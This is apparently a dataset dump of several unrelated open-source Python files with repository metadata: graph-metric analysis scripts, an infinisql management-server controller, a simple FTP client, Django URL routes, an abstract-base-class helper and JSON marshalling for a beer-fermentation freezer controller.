for x in range(0, len(dorig.mean(axis=1).values), sa):
print "(" + str(dorig.mean(axis=1).index[x]) + ", " + str(dorig.mean(axis=1).values[x]) + ")"
return
def alchemee(graph,graphName):
g = graph
gn = graphName
lst_files = glob("../BTERgraphs/*{}*th.tsv".format(gn))
for j,f in enumerate(lst_files):
print '--<{}>-- {} --'.format(j,f)
a = nx.read_edgelist(f)
# degree_prob_distributuion( [g], [a], gn)
# print '-- network value --'
# network_value_distribution([g], [a], gn)
# print '-- Hop Plot --'
# hop_plots([g], [a], gn)
# print '\tclustering coeffs -- \n'
# clustering_coefficients([g], [a], gn)
print '\tdraw_assortativity_coefficients -- \n'
assortativity([g], [a], gn)
# print '\tdraw_kcore_decomposition -- \n'
# kcore_decomposition([g], [a], gn)
return
def get_parser():
parser = argparse.ArgumentParser(description='shelves: Process Infinity Mirror Graphs')
parser.add_argument('--g', metavar='GRAPH', help='graph edge-list')
parser.add_argument('--version', action='version', version=__version__)
return parser
def main():
global name
parser = get_parser()
args = vars(parser.parse_args())
if not args['g']:
parser.print_help()
os._exit(1)
print args['g']
try:
cg = nx.read_edgelist(args['g'])
# shlv = shelve.open(args['shl'])
except Exception, e:
print str(e)
cg = nx.read_edgelist(args['g'], comments="%")
name = os.path.basename(args['g']).rstrip('.txt')
if 1:
alchemee(cg, name)
print 'alchemee: Done'
exit(0)
if 1:
lst_files = glob("../Results/synthg_*"+ str(name)+ "*.shl")
for j,shlf in enumerate(lst_files):
shlv = shelve.open(shlf)
print "====>", j, len(shlv['clgm'][0]), len(shlv['kpgm'][0]), len(shlv['kpgm'][0][0]), type(shlv['kpgm'][0][0])
# print '\tdraw_degree_probability_distribution', '-'*40
# metrics.draw_degree_probability_distribution(orig_g_M=[cg], HRG_M=[], pHRG_M=[], chunglu_M=shlv['clgm'][0], kron_M=shlv['kpgm'][0]) #( chunglu_M, HRG_M, pHRG_M, kron_M)
# print '\tdraw_network_value','-'*40
# metrics.draw_network_value([cg], shlv['clgm'][0], [], [], shlv['kpgm'][0])
# print '\tdraw_hop_plot','-'*40
# metrics.draw_hop_plot([cg], shlv['clgm'][0], [], [], shlv['kpgm'][0])
# print '\tdraw_kcore_decomposition','-'*40
# metrics.draw_kcore_decomposition([cg], shlv['clgm'][0], [], [], shlv['kpgm'][0])
# print '\tdraw_clustering_coefficients','-'*40
# metrics.draw_clustering_coefficients([cg], shlv['clgm'][0], [], [], shlv['kpgm'][0])
# print '\tdraw_assortativity_coefficients','-'*40
# metrics.draw_assortativity_coefficients([cg], shlv['clgm'][0], [], [], shlv['kpgm'][0])
# metrics.draw_diam_plot([], [chunglu_M, HRG_M, pHRG_M, kron_M] )
# metrics.draw_degree_rank_plot(G, chunglu_M)
# metrics.draw_network_value(G, chunglu_M)
# print '-- degree dist --'
# degree_prob_distributuion( [cg], shlv['kpgm'][0], name)
# print '-- network value --'
# network_value_distribution([cg], shlv['kpgm'][0], name)
# print '-- Hop Plot --'
# hop_plots([cg], [shlv['kpgm'][0][0]], name)
# print '-- clustering coeffs --'
# clustering_coefficients([cg], shlv['kpgm'][0], name)
# print '\tdraw_assortativity_coefficients','-'*40
# assortativity([cg], shlv['kpgm'][0], name)
print '\tdraw_kcore_decomposition','-'*40
kcore_decomposition([cg], shlv['kpgm'][0], name)
else:
lst_files = glob("../Results/*"+ str(name)+ "*.shl")
with open('../Results/{}_gcd_infinity.txt'.format(str(name)), 'w') as tmp:
tmp.write('-- {} ----\n'.format(name))
for j,shlf in enumerate(lst_files):
print "--"+ shlf + "-"*40
shlv = shelve.open(shlf)
df_g = metrics.external_rage(cg)
gcm_g = metrics.tijana_eval_compute_gcm(df_g)
clgm_gcd = []
kpgm_gcd = []
tmp.write('---- clgm ----\n')
for i,sg in enumerate(shlv['clgm'][0]):
df = metrics.external_rage(sg)
gcm_h = metrics.tijana_eval_compute_gcm(df)
s = metrics.tijana_eval_compute_gcd(gcm_g, gcm_h)
#
# tmp.write("(" + str(i) + "," + str(s) + ')\n')
clgm_gcd.append(s)
tmp.write("(" +str(j) +"," + str(np.mean(clgm_gcd)) + ')\n')
tmp.write('---- kpgm ----\n')
for i,sg in enumerate(shlv['kpgm'][0]):
df = metrics.external_rage(sg)
gcm_h = metrics.tijana_eval_compute_gcm(df)
s = metrics.tijana_eval_compute_gcd(gcm_g, gcm_h)
#
# tmp.write("(" + str(i) + "," + str(s) + ')\n')
kpgm_gcd.append(s)
tmp.write("(" +str(j) +"," + str(np.mean(kpgm_gcd)) + ')\n')
if __name__ == "__main__":
try:
main()
except Exception, e:
print str(e)
traceback.print_exc()
os._exit(1)
sys.exit(0)
|
gpl-3.0
| -7,554,848,798,561,009,000
| 32.330827
| 176
| 0.558764
| false
| 2.811034
| false
| false
| false
|
infinisql/infinisql
|
manager/infinisqlmgr/management_server.py
|
1
|
4169
|
__author__ = 'Christopher Nelson'
import logging
import os
import signal
import time
from infinisqlmgr import common, management
def start_management_server(config):
from infinisqlmgr.management import util
common.configure_logging(config)
cluster_name = config.get("management", "cluster_name")
existing_pid = util.get_pid(config.dist_dir, cluster_name)
if existing_pid is not None:
logging.error("A management process appears to exist already. You should run the 'manager stop' command first "
"to make sure the existing process has stopped.")
return 1
logging.debug("forking management server")
pid = os.fork()
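    # In the parent, os.fork() returns the child's pid: record it and return. In the child it returns 0,
    # and execution continues below as the actual management server.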
if pid!=0:
util.write_pid(config.dist_dir, cluster_name, pid)
logging.info("Parent start_management_server() finished")
return 0
logging.debug("creating management process")
management_server = management.Controller(config)
logging.debug("starting management process")
return management_server.run()
def stop_management_server(config):
from infinisqlmgr.management import util
common.configure_logging(config)
cluster_name = config.get("management", "cluster_name")
existing_pid = util.get_pid(config.dist_dir, cluster_name)
if existing_pid is not None:
logging.info("Trying to stop the existing process at pid %d", existing_pid)
try:
os.kill(existing_pid, signal.SIGTERM)
except ProcessLookupError:
logging.debug("the management process is not running")
else:
logging.info("Waiting for process %d exit", existing_pid)
try:
pid, exit_status = os.waitpid(existing_pid, 0)
except ChildProcessError:
# We ignore this because the child process might have already gone away, and we
# won't be able to get status information about it.
pass
else:
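                # os.waitpid() packs the exit code into the high byte of the status word
                # (the low byte carries the terminating signal, if any).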
return_code = exit_status >> 8
logging.debug("management process exited with code %d", return_code)
if return_code!=0:
logging.warning("There was an error while stopping the management process, check the logs for more detail.")
# Make sure that the pid file is gone, even if it's empty.
if util.exists(config.dist_dir, cluster_name):
run_path = util.get_run_path(config.dist_dir, cluster_name)
logging.debug("deleting run file at: %s", run_path)
os.unlink(run_path)
logging.info("Stopped management process for cluster: %s" % cluster_name)
def restart_management_server(config):
stop_management_server(config)
time.sleep(1)
start_management_server(config)
def add_args(sub_parsers):
mgr_parser = sub_parsers.add_parser('manager', help='Options for controlling a management process')
mgr_parser.add_argument('--no-background', dest='daemonize', action='store_false',
default=True,
help='Do not run the manager in the background. Useful for debugging. (default is off)')
mgr_parser.add_argument('--cluster-name', dest='cluster_name',
default="default_cluster",
help='Set the cluster name to join. If the cluster does not exist it will be created. '
'(default is %(default)s)')
ss_parsers = mgr_parser.add_subparsers()
start_parser = ss_parsers.add_parser('start', help='Start a management process')
mgr_parser.add_argument('--listen-interface', dest='management_interface',
default="*",
help='Set the interface to listen on.'
'(default is %(default)s)')
start_parser.set_defaults(func=start_management_server)
stop_parser = ss_parsers.add_parser('stop', help='Stop a management process')
stop_parser.set_defaults(func=stop_management_server)
restart_parser = ss_parsers.add_parser('restart', help='Restart a management process')
restart_parser.set_defaults(func=restart_management_server)
|
gpl-3.0
| -880,550,437,333,261,600
| 41.111111
| 128
| 0.638283
| false
| 4.297938
| true
| false
| false
|
ndparker/tdi3
|
tdi/_abstract.py
|
1
|
1329
|
# -*- coding: ascii -*-
u"""
:Copyright:
Copyright 2017
Andr\xe9 Malo or his licensors, as applicable
:License:
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
================
ABC base setup
================
ABCs base setup
"""
__author__ = u"Andr\xe9 Malo"
__docformat__ = "restructuredtext en"
import abc as _abc
# pylint: disable = invalid-name
base = type.__new__(_abc.ABCMeta, 'base', (), {})
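# 'base' is an empty abstract base class, created by invoking the ABCMeta metaclass directly.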
method = _abc.abstractmethod
def make_impl(space):
""" Make impl function """
def impl(*which):
""" Register implementation for abstract ... """
def inner(cls):
""" Decorator """
for target in which:
if isinstance(target, str):
target = space[target]
target.register(cls)
return cls
return inner
return impl
|
apache-2.0
| -4,359,358,447,965,685,000
| 25.058824
| 73
| 0.638074
| false
| 4.287097
| false
| false
| false
|
NileshPS/OS-and-Networking-programs
|
5_ftp/client.py
|
1
|
5165
|
#!/usr/bin/python3
import socket
import os
import sys
import logging as log
import getpass
from helper import *
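# The star import is expected to provide FTPRequest, FTPResponse, FileWrapper, COMMANDS,
# sock_send and sock_recv, which are used throughout this module.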
log.basicConfig(format="[%(levelname)s] %(message)s", level=log.DEBUG)
class FTPError(Exception):
pass
class FTPClient:
def __init__(self):
self.sock = None
self.is_connected = False
self.is_authenticated = False
self.server_name = ''
# Establish a connection with remote FTP host
def open(self, hostname='', port=3302):
if self.is_connected:
raise FTPError(
'Already connected to %s, use close first.' % self.server_name)
self.sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self.sock.settimeout(5)
try:
port = int(port)
except ValueError:
raise FTPError("Bad port address.")
self.sock.connect((hostname, port))
# Ping the server
sock_send(self.sock, FTPRequest('ping'))
# Print response
print(sock_recv(self.sock))
self.server_name = hostname # Save hostname for later
self.is_connected = True
# Initialise authentication procedure
self.init_auth()
def is_open(self):
return self.is_connected
def init_auth(self):
username = input("Name (%s) : " % self.server_name).strip()
passwd = getpass.getpass("Password : ")
# Authenticate with server
sock_send(self.sock, FTPRequest('auth', [username, passwd]))
response = sock_recv(self.sock)
if response.code // 100 != 2:
            raise FTPError('%d %s' % (response.code, 'Login Incorrect.'))
print(response.message)
self.is_authenticated = True
def send(self, query):
if not self.is_connected:
raise FTPError('Not Connected.')
if not self.is_authenticated:
raise FTPError('530 Please login with USER and PASS.')
if len(query) == 0:
return None # Silently ignore
elif query[0] == 'get' or query[0] == 'put':
if len(query) != 2:
raise FTPError('Please provide a filename.')
if query[0] == 'put':
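                # 'put' reads the whole local file into memory and wraps it in a FileWrapper before sending.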
try:
pack = FTPRequest('put', [
FileWrapper(query[1],
open(query[1], 'rb').read())])
sock_send(self.sock, pack)
return sock_recv(self.sock)
except OSError as oe:
raise FTPError(str(oe))
# else
pack = FTPRequest(query[0], query[1:])
sock_send(self.sock, pack)
return sock_recv(self.sock)
def close(self):
if (self.sock is not None):
sock_send(self.sock, FTPRequest('close'))
self.sock.close()
self.is_connected = False
self.is_authenticated = False
self.server_name = ''
self.sock = None
client = FTPClient()
def main():
global client
while True:
try:
query = input("ftp> ").strip().split(" ")
if len(query) == 0:
continue
if query[0] == '?':
# Show a list of available features
print(' '.join(COMMANDS))
elif query[0] == 'open':
# Establish a remote connection
if len(query) == 1:
query.append(input("(to) "))
client.open(query[1], query[2] if len(query) > 2 else 3302)
elif query[0] == 'close':
client.close()
log.info("Disconnected.")
elif query[0] == 'exit':
client.close()
break
elif query[0] == 'lcd':
try:
if len(query) == 2:
os.chdir(query[1])
except Exception as e:
raise FTPError(str(e))
elif query[0] not in COMMANDS:
log.error("Invalid command. Type ? for help")
else:
response = client.send(query)
if response.action == FTPResponse.ACTION_DISPLAY:
log.info(response)
log.info(response.data.decode('utf8'))
elif response.action == FTPResponse.ACTION_SAVE:
if type(response.data) != FileWrapper:
raise TypeError(
"Expected type of FileWrapper in Response.data." +
" Got %s." % str(type(response.data)))
try:
response.data.write(os.getcwd())
log.info(str(response))
except OSError as e:
log.error(str(e))
elif response.action == FTPResponse.ACTION_IGNORE:
log.info(response)
except FTPError as fe:
log.error(str(fe))
if __name__ == '__main__':
try:
main()
except KeyboardInterrupt as e:
if client is not None:
client.close()
client = None
sys.exit(0)
|
gpl-3.0
| 5,413,776,981,236,701,000
| 32.322581
| 79
| 0.501839
| false
| 4.347643
| false
| false
| false
|
juanc27/myfavteam
|
mysite/urls.py
|
1
|
1833
|
from django.conf.urls import patterns, include, url
from django.contrib import admin
from django.conf import settings
from django.conf.urls.static import static
admin.autodiscover()
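# Each section is routed twice: once with an explicit team_id in the URL and once without
# (the view presumably falls back to a default team).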
urlpatterns = patterns('',
# Examples:
# url(r'^$', 'mysite.views.home', name='home'),
# url(r'^blog/', include('blog.urls')),
url(r'^admin/', include(admin.site.urls)),
url(
regex=r'^team/(?P<team_id>\d+)/$',
view='myfavteam.views.index'),
url(
regex=r"^$",
view='myfavteam.views.index'),
url(
regex=r'^news/team/(?P<team_id>\d+)/$',
view='myfavteam.views.news'),
url(
regex=r"^news/",
view='myfavteam.views.news'),
url(
regex=r'^social/team/(?P<team_id>\d+)/$',
view='myfavteam.views.social'),
url(
regex=r"^social/",
view='myfavteam.views.social'),
url(
regex=r'^schedule/team/(?P<team_id>\d+)/$',
view='myfavteam.views.schedule'),
url(
regex=r"^schedule/",
view='myfavteam.views.schedule'),
url(
regex=r'^standings/team/(?P<team_id>\d+)/$',
view='myfavteam.views.standings'),
url(
regex=r"^standings/",
view='myfavteam.views.standings'),
url(
regex=r'^stats/team/(?P<team_id>\d+)/$',
view='myfavteam.views.stats'),
url(
regex=r"^stats/",
view='myfavteam.views.stats'),
url(
regex=r'^roster/team/(?P<team_id>\d+)/$',
view='myfavteam.views.roster'),
url(
regex=r"^roster/",
view='myfavteam.views.roster'),
url(
regex=r'^player/(?P<player_id>\d+)/$',
view='myfavteam.views.player'),
url(
regex=r"^player/",
view='myfavteam.views.player'),
) + static(settings.MEDIA_URL, document_root=settings.MEDIA_ROOT)
|
mit
| -4,842,875,258,234,641,000
| 28.095238
| 65
| 0.556465
| false
| 3.320652
| false
| true
| false
|
ElementalAlchemist/txircd
|
txircd/modules/rfc/cmd_userhost.py
|
1
|
1249
|
from twisted.plugin import IPlugin
from twisted.words.protocols import irc
from txircd.module_interface import Command, ICommand, IModuleData, ModuleData
from zope.interface import implements
class UserhostCommand(ModuleData, Command):
implements(IPlugin, IModuleData, ICommand)
name = "UserhostCommand"
core = True
def userCommands(self):
return [ ("USERHOST", 1, self) ]
def parseParams(self, user, params, prefix, tags):
if not params:
user.sendSingleError("UserhostParams", irc.ERR_NEEDMOREPARAMS, "USERHOST", "Not enough parameters")
return None
return {
"nicks": params[:5]
}
def execute(self, user, data):
userHosts = []
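        # Each reply has the form "<nick>[*]=<+|-><ident>@<host>": "*" marks an IRC operator,
        # "-" a user who is marked away, "+" one who is not.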
for nick in data["nicks"]:
if nick not in self.ircd.userNicks:
continue
targetUser = self.ircd.users[self.ircd.userNicks[nick]]
output = targetUser.nick
if self.ircd.runActionUntilValue("userhasoperpermission", targetUser, "", users=[targetUser]):
output += "*"
output += "="
if targetUser.metadataKeyExists("away"):
output += "-"
else:
output += "+"
output += "{}@{}".format(targetUser.ident, targetUser.host())
userHosts.append(output)
user.sendMessage(irc.RPL_USERHOST, " ".join(userHosts))
return True
userhostCmd = UserhostCommand()
|
bsd-3-clause
| -2,786,711,777,351,139,300
| 28.761905
| 102
| 0.707766
| false
| 3.252604
| false
| false
| false
|
Theoklitos/chestfreezer
|
chestfreezer-backend/util/json_parser.py
|
1
|
6422
|
'''
Created on Apr 4, 2014
Simple json marshalling utils for the classes in this project
#TODO Note: This whole module is pointless! Bottle.py can easily marshal dictionaries into/from json!
@author: theoklitos
'''
from control import brew_logic
from util import misc_utils, configuration
from database import db_adapter
def _pretty_state_identifier(state):
""" returns 'off' for False and 'on' for True """
if state:
return 'on'
else:
return 'off'
def get_temperature_reading_array_as_json(temperature_reading_list):
""" returns a list of temp readings as a json array """
result = '['
for temperature_reading in temperature_reading_list:
result += '\n' + get_temperature_reading_as_json(temperature_reading) + ','
if len(temperature_reading_list) != 0:
result = result[:-1]
return result + '\n]'
def get_temperature_reading_as_json(temperature_reading):
""" returns a single temp reading as a json object """
result = '{\n "probe_id" : "' + temperature_reading.probe_id + '",\n "temperature_C" : "' + str(temperature_reading.temperature_C) + '",\n "temperature_F" : "' + str(temperature_reading.temperature_F) + '",\n "timestamp" : "' + str(temperature_reading.timestamp) + '"\n}'
return result
def get_heater_device_json():
""" returns information about the heater in json """
return '{\n "state" : "' + _pretty_state_identifier(brew_logic.heater_state) + '",\n "overridden" : "' + str(brew_logic.heater_override).lower() + '"\n }'
def get_freezer_device_json():
""" returns information about the freezer in json """
return '{\n "state" : "' + _pretty_state_identifier(brew_logic.freezer_state) + '",\n "overridden" : "' + str(brew_logic.freezer_override).lower() + '"\n }'
def get_both_devices_json():
""" returns information about both the freezer and the heater as a json object """
return '{\n "heater" : ' + get_heater_device_json() + ',\n "freezer" : ' + get_freezer_device_json() + '\n}'
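# Example of the combined payload (values illustrative):
# {"heater": {"state": "on", "overridden": "false"}, "freezer": {"state": "off", "overridden": "true"}}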
def get_probe_array_as_json(probe_list):
""" returns a list of temp probes as a json array """
result = '['
for probe in probe_list:
result += '\n' + get_probe_as_json(probe) + ','
return result[:-1] + '\n]'
def get_probe_as_json(probe):
""" returns a single temp probe as a json object """
master_value = 'False'
if probe.master == 1:
master_value = 'True'
result = '{\n "probe_id" : "' + str(probe.probe_id) + '",\n "name" : "' + str(probe.name) + '",\n "master" : "' + master_value + '"\n}'
return result
def get_instruction_as_json(instruction):
""" returns a single instruction as a json object """
result = '{\n "instruction_id" : "' + instruction.instruction_id + '",\n "target_temperature_C" : "' + str(instruction.target_temperature_C) + '",\n "from_timestamp" : "' + str(instruction.from_timestamp) + '",\n "to_timestamp" : "' + str(instruction.to_timestamp) + '",\n "description" : "' + instruction.description + '"\n}'
return result
def get_instruction_array_as_json(instruction_list):
""" returns the given instruction array as a json list """
result = '['
for instruction in instruction_list:
result += '\n' + get_instruction_as_json(instruction) + ','
if len(instruction_list) != 0:
result = result[:-1]
return result + '\n]'
def get_target_temperature_json():
""" returns information about the current "target" temperature """
is_overriden = False
if brew_logic.temperature_override_C is not None:
actual_target_C = brew_logic.temperature_override_C
is_overriden = True
elif brew_logic.instruction_target_temperature_C is not None: actual_target_C = brew_logic.instruction_target_temperature_C
    elif (brew_logic.instruction_target_temperature_C is None) and (not is_overriden): return
if actual_target_C is None: return
current_instruction_json = ""
actual_target_F = misc_utils.celsius_to_fahrenheit(actual_target_C)
if brew_logic.current_instruction_id is not None: current_instruction_json = ',\n"current_instruction_id" : "' + brew_logic.current_instruction_id + '" '
return '{\n "target_temperature_C" : ' + str(actual_target_C) + ',\n "target_temperature_F" : ' + str(actual_target_F) + ',\n "overridden" : "' + str(is_overriden).lower() + '"' + current_instruction_json + '\n}'
def get_settings_as_json():
""" returns the application options as a json object """
store_temperature_interval_seconds = configuration.store_temperature_interval_seconds()
l1 = ' "store_temperature_interval_seconds" : ' + str(int(store_temperature_interval_seconds)) + ',';
instruction_interval_seconds = configuration.instruction_interval_seconds()
l2 = ' "instruction_interval_seconds" : ' + str(int(instruction_interval_seconds)) + ',';
control_temperature_interval_seconds = configuration.control_temperature_interval_seconds()
l3 = ' "monitor_temperature_interval_seconds" : ' + str(int(control_temperature_interval_seconds)) + ',';
temperature_tolerance = configuration.temperature_tolerance()
l4 = ' "temperature_tolerance_C" : ' + str(temperature_tolerance) + ',';
database_size = db_adapter.get_database_size()
l5 = ' "database_size_MB" : ' + str(round(database_size,1)) + ',';
database_free_size = db_adapter.get_database_free_size()
l6 = ' "database_free_size_MB" : ' + str(round(database_free_size,1)) + '';
return '{\n ' + l1 + '\n ' + l2 + '\n ' + l3 + '\n ' + l4 + '\n ' + l5 + '\n ' + l6 + '\n}'
def get_beer_as_json(beer):
""" returns the given beer as a json object """
return {'beer_id' : beer.beer_id, 'name' : beer.name, 'style' : beer.style, 'fermenting_from' : beer.fermenting_from_timestamp, 'fermenting_to' : beer.fermenting_to_timestamp, 'dryhopping_from' : beer.dryhopping_from_timestamp, 'dryhopping_to' : beer.dryhopping_to_timestamp, 'conditioning_from' : beer.conditioning_from_timestamp, 'conditioning_to' : beer.conditioning_to_timestamp, 'rating' : beer.rating, 'comments' : beer.comments}
def get_all_beers_as_json():
""" returns all the beers in the database as a json array """
from json import dumps
result = []
for beer in db_adapter.get_all_beers():
result.append(get_beer_as_json(beer))
return dumps(result)
|
mit
| 5,555,243,227,549,169,000
| 53.888889
| 439
| 0.646372
| false
| 3.325738
| false
| false
| false
|